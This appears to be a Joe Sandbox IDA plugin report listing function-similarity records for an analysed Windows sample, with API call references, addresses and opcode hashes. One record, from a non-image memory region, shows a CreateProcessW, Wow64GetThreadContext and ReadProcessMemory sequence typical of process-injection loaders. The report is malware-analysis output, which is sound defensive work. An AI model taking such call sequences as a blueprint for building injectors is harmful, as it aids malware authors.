                                                                        • String ID:
                                                                        • API String ID: 924797094-0
                                                                        • Opcode ID: 857728880402b8796403d773506f7a78890231d8983723b92e59e9e4624f3e27
                                                                        • Instruction ID: 114ce598be85e9f83a209675add8c767f65967cfb1dd3fc7762542e1ca27013e
                                                                        • Opcode Fuzzy Hash: 857728880402b8796403d773506f7a78890231d8983723b92e59e9e4624f3e27
                                                                        • Instruction Fuzzy Hash: 73116A7191C3559FC300EF29E949A1ABBE8EB94720F008A1EF584872A1DB709585DB92
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 0091EA29
                                                                        • __close_nolock.LIBCMT ref: 0091EA42
                                                                          • Part of subcall function 00917BDA: __getptd_noexit.LIBCMT ref: 00917BDA
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                        • String ID:
                                                                        • API String ID: 1046115767-0
                                                                        • Opcode ID: 044ff18604f593d7f9288720d1cd4a9dc6bb321d1d63d36881d6d2c9a56d34de
                                                                        • Instruction ID: 16218b0c6892636edb2f5379fe34bc8debc10b44eb03c75c478055594c4c0ed8
                                                                        • Opcode Fuzzy Hash: 044ff18604f593d7f9288720d1cd4a9dc6bb321d1d63d36881d6d2c9a56d34de
                                                                        • Instruction Fuzzy Hash: 3711C672B4961D8AE711BFA4C9413D87A606FC1331F260340E8615F2E2C7B48DC0DAA5
                                                                        APIs
                                                                          • Part of subcall function 0091395C: __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 0091395C: __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        • std::exception::exception.LIBCMT ref: 0090F51E
                                                                        • __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                          • Part of subcall function 00916805: RaiseException.KERNEL32(?,?,0000000E,009A6A30,?,?,?,0090F538,0000000E,009A6A30,?,00000001), ref: 00916856
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: 9f5ffcc955c0dfb7d8c7c98bca048cc2ae5ef537f74a0cff8a07e19ce0480c0f
                                                                        • Instruction ID: 7f47071a0a2783dfd44a93f8adffa3dff45ed19c4c0dfedb4f6eb4f6415ed230
                                                                        • Opcode Fuzzy Hash: 9f5ffcc955c0dfb7d8c7c98bca048cc2ae5ef537f74a0cff8a07e19ce0480c0f
                                                                        • Instruction Fuzzy Hash: 59F02D3260021D6BD724BF98DC22AEE77EC6F40354F208475F908D14C1CBB0D78482A5
                                                                        APIs
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __lock_file.LIBCMT ref: 00913629
                                                                          • Part of subcall function 00914E1C: __lock.LIBCMT ref: 00914E3F
                                                                        • __fclose_nolock.LIBCMT ref: 00913634
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: 6234ceccd2d08f733bfac8b6dc704436943aff80f2fc05914f2950db808cec93
                                                                        • Instruction ID: 99dd80cc3103f7cf3e3cd197023a358d5b2f47c26a38833bec4ea2354a66b759
                                                                        • Opcode Fuzzy Hash: 6234ceccd2d08f733bfac8b6dc704436943aff80f2fc05914f2950db808cec93
                                                                        • Instruction Fuzzy Hash: 0AF09631B4520CAAD7116B6588077DE7AB45FC1774F25C108E425AB2C1C77C86819A95
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 012760D3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01276169
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0127618B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                        • Instruction ID: 7c661d49672051287c337cdbfbb267915442e6defe4c8c5cdabfda0109ed1455
                                                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                        • Instruction Fuzzy Hash: C912CE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                        APIs
                                                                        • __flush.LIBCMT ref: 00912A0B
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __flush__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 4101623367-0
                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction ID: f08c385bc35656f2631b2b65b1056a4b6220749fd61d5f24099daf1cbc34b570
                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction Fuzzy Hash: 2B41857170070E9FDF28AF69C9815EE77AAAF84360F24852DE855C7280E674DDE18B44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: ae8c78f5b9259fb241efffc52a58e149ca4bf7de1aafdfdf83c933d85578715a
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 7531C475A00106DFD718DF58C490A69FBAAFF89340B648AA5E409CB2D6DB35EDC1CB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9954227033557572d9ee409fe610f84f3a9dcc6e1a7467747340bc3076f8a0f0
                                                                        • Instruction ID: 6355f36dd8c6dc293e2265bb4289314503bcd2f371b71ece80a711d98ca75b24
                                                                        • Opcode Fuzzy Hash: 9954227033557572d9ee409fe610f84f3a9dcc6e1a7467747340bc3076f8a0f0
                                                                        • Instruction Fuzzy Hash: 38317075104528DFCB01EF12D09576E7BB0FF89321F10888AEAD55B395E774A90ACF81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: c275ef9d64201445d65b2545c9a90ced1b8c44aef0779275d5fbf2d25eecd379
                                                                        • Instruction ID: 0bbd642682e4d51609ce44ef56037571aadc2a959a5e8031ff02a893061ab1da
                                                                        • Opcode Fuzzy Hash: c275ef9d64201445d65b2545c9a90ced1b8c44aef0779275d5fbf2d25eecd379
                                                                        • Instruction Fuzzy Hash: 75415E705047118FDB24DF24C454B1ABBE4BF85308F19895CE99A4B3A2C772F845CF52
                                                                        APIs
                                                                          • Part of subcall function 008F4214: FreeLibrary.KERNEL32(00000000,?), ref: 008F4247
                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008F39FE,?,00000001), ref: 008F41DB
                                                                          • Part of subcall function 008F4291: FreeLibrary.KERNEL32(00000000), ref: 008F42C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load
                                                                        • String ID:
                                                                        • API String ID: 2391024519-0
                                                                        • Opcode ID: b0077633db435374dd71259a6a2d4480768d13548e8d314030c5d507d64511c6
                                                                        • Instruction ID: b2d7833b84b0f6bafce586244872d6fe70457398f03d0788b3e65bc1d6b3a930
                                                                        • Opcode Fuzzy Hash: b0077633db435374dd71259a6a2d4480768d13548e8d314030c5d507d64511c6
                                                                        • Instruction Fuzzy Hash: 3911943160020EAADB10AB78DC06FAF77A9EF80704F10843AB696E61C1DB749A419B61
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 278e8e4b9def4c9e96dcd6046da40b349b31501877fd3bb2f3df991d9023195f
                                                                        • Instruction ID: d2faf3f5a2aa108beae27b0aa2e3b397c59556fd2d441661d3e491af98315424
                                                                        • Opcode Fuzzy Hash: 278e8e4b9def4c9e96dcd6046da40b349b31501877fd3bb2f3df991d9023195f
                                                                        • Instruction Fuzzy Hash: 45212370508705CFDB24DF28C854B2ABBF5BF85304F144968FA9A8B6A2C732E845CF52
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 0091AFC0
                                                                          • Part of subcall function 00917BDA: __getptd_noexit.LIBCMT ref: 00917BDA
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                        • String ID:
                                                                        • API String ID: 1144279405-0
                                                                        • Opcode ID: 90a4efb1e9731595673eb36f8c7a94fd20feb333b915ad849206d5e4e18fb418
                                                                        • Instruction ID: 33c6410cfac8e2375c44ae6b0f3e53b2b7085896deb4078d8ba3ffd6ed2c537f
                                                                        • Opcode Fuzzy Hash: 90a4efb1e9731595673eb36f8c7a94fd20feb333b915ad849206d5e4e18fb418
                                                                        • Instruction Fuzzy Hash: E511B272B4960C8FE7126FA4C9413DD7A619FC5335F254740E4741B2E2C7B48DC09BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                        • Instruction ID: 40852586f8f41b41dfc79b9b967aa5ef166b04cf6a3dd6d9be9de44c79e982d3
                                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                        • Instruction Fuzzy Hash: FA01127150050DAE8B05EF74C8918FFBB78EA11344F108066A655D6195EA309A49DB61
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00912AED
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2597487223-0
                                                                        • Opcode ID: 267379c72dac79cd69a885ae959bccd2fae4e1fd1c9d14616266a49c8f1bdfe9
                                                                        • Instruction ID: e221d7ac0b7d5848840abb3d278b6c28914ae858304871b454a8806ec0f58cc3
                                                                        • Opcode Fuzzy Hash: 267379c72dac79cd69a885ae959bccd2fae4e1fd1c9d14616266a49c8f1bdfe9
                                                                        • Instruction Fuzzy Hash: 7AF06D31B4020DAADF21BFB98D067DF3AA9BF80320F158515B4149A1D1D7788AF2DB91
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,008F39FE,?,00000001), ref: 008F4286
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: a0049e11190e66c0cd5deeaba34ebc035c2be1db5ee8eceaefbb2396d8456e4e
                                                                        • Instruction ID: 5e1b7ceec724716251ab72e9861c9e350b9eebe4427762ede67e27caa1170e3b
                                                                        • Opcode Fuzzy Hash: a0049e11190e66c0cd5deeaba34ebc035c2be1db5ee8eceaefbb2396d8456e4e
                                                                        • Instruction Fuzzy Hash: 40F0F27150970ACFCB349F749890826BBE5FE0432A3249A3FF29A82610C7329980DB50
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F40C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: e4596b194ec2591d5fb0c2ba10f051ba9a0f5bccb6cb4106546e630385643594
                                                                        • Instruction ID: f274697d7c3358a5a907400fbb73b73615ee5081936a79d43273449e3bf14e10
                                                                        • Opcode Fuzzy Hash: e4596b194ec2591d5fb0c2ba10f051ba9a0f5bccb6cb4106546e630385643594
                                                                        • Instruction Fuzzy Hash: 57E0C2376042285BC711A668CC46FFA77ADEFC87A0F0901B5FA09E7244EA74A9C19690
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01276929
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: ecdb9b9d9d4876e72f2a7476822f7d6bbdf387dea8eb8471be52b7b4d58454f9
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 9AE0E67494010DDFDB00DFB4D5496EE7FB4EF04701F100161FD01D2280D6309D508A62
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0095F87D
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095F8DC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0095F919
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095F940
                                                                        • SendMessageW.USER32 ref: 0095F966
                                                                        • _wcsncpy.LIBCMT ref: 0095F9D2
                                                                        • GetKeyState.USER32(00000011), ref: 0095F9F3
                                                                        • GetKeyState.USER32(00000009), ref: 0095FA00
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095FA16
                                                                        • GetKeyState.USER32(00000010), ref: 0095FA20
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095FA4F
                                                                        • SendMessageW.USER32 ref: 0095FA72
                                                                        • SendMessageW.USER32(?,00001030,?,0095E059), ref: 0095FB6F
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0095FB85
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0095FB96
                                                                        • SetCapture.USER32(?), ref: 0095FB9F
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FC03
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0095FC0F
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0095FC29
                                                                        • ReleaseCapture.USER32 ref: 0095FC34
                                                                        • GetCursorPos.USER32(?), ref: 0095FC69
                                                                        • ScreenToClient.USER32(?,?), ref: 0095FC76
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095FCD8
                                                                        • SendMessageW.USER32 ref: 0095FD02
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095FD41
                                                                        • SendMessageW.USER32 ref: 0095FD6C
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0095FD84
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0095FD8F
                                                                        • GetCursorPos.USER32(?), ref: 0095FDB0
                                                                        • ScreenToClient.USER32(?,?), ref: 0095FDBD
                                                                        • GetParent.USER32(?), ref: 0095FDD9
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095FE3F
                                                                        • SendMessageW.USER32 ref: 0095FE6F
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FEC5
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0095FEF1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095FF19
                                                                        • SendMessageW.USER32 ref: 0095FF3C
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FF86
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0095FFB6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0096004B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 2516578528-4164748364
                                                                        • Opcode ID: ddb6f89f0a246e00f2be5ebe4e4aff12c53aeeddfed6a80279522ec79a5bbb14
